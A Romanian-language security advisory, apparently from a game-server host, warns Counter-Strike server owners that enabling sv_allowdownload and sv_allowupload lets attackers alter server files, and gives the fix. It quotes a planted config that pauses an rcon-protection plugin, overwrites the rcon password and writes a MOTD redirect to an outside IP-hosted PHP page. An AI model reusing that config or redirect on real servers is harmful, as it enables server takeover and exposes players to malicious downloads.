Acum câteva luni de zile am descoperi un exploit in Counter Strike.
Dacă aveați in server.cfg:
sv_allowdownload „1”
sv_allowupload „1”
putea să acceseze și să modifice orice fișier din serverul vostru de counter strike.
Problema se rezolva relativ foarte simplu, trebuia să puneți in loc de unu, zero, adică așa:
sv_allowdownload „0”
sv_allowupload „0”
Cei care profitau de acest exploit in general schimbau motd-ul, iși dădeau admine, furau parola rcon, etc.. sau forța utilizatorul să downloadeze un virus.
Recent văzând ca cei care au fost vulnerabili făceau aceste modificări s-au gândit la o metodă mai ingenioasă de a avea acces chiar dacă voi făceați aceste modificări dându-vă impresia că nu asta e rezolvarea, profitau de faptul că avea acces la tot serverul și vi-l modificau, adică audăugau configuri noi in server.cfg gen exec numeconfig care fiind după parola inițiala de rcon o rescria.
Un client ne-a spus că i-au pus si pluginuri care făceau aceste modificări in server automat la fiecare restart, fisiere config de genul de_dust2.cfg / de_nuke.cfg / menu.cfg create in directorul configs localizat in addons/amxmodx/configs/maps/
amxx pause rcon_defencer.amxx
rcon_password „56425642”
motdfile motd.txt
motd_write <META HTTP-EQUIV=Refresh CONTENT=”0 URL=http://78.110.60.137//abunaimo.php?jecttely=674660″>
Nu vă recomandăm să folosiți pluginuri de genul: rcon_defencer.amxx http://swat-zone.com/forum/showthread.php?1699-RCON-Defencer
Mare atenție să aveți zero in loc de unu in server.cfg la sv_allowdownload si sv_allowupload, pe cât este de simplă soluția pe atât este de periculoasă problema, dacă are acces la serverul vostru poate crea foarte multe fișiere in foarte multe locații care sunt executate fara ca voi să știți unde se află, o dată ce reușește acest lucru e greu să vă curățați serverul.
Aceste setări nu afectează downloadurl-ul!
Dacă observați că aveți probleme și fisierele serverului v-au fost compromise, vă rog să ne contactați pentru a ne cere un backup-ul cu fisierele serverului curate.
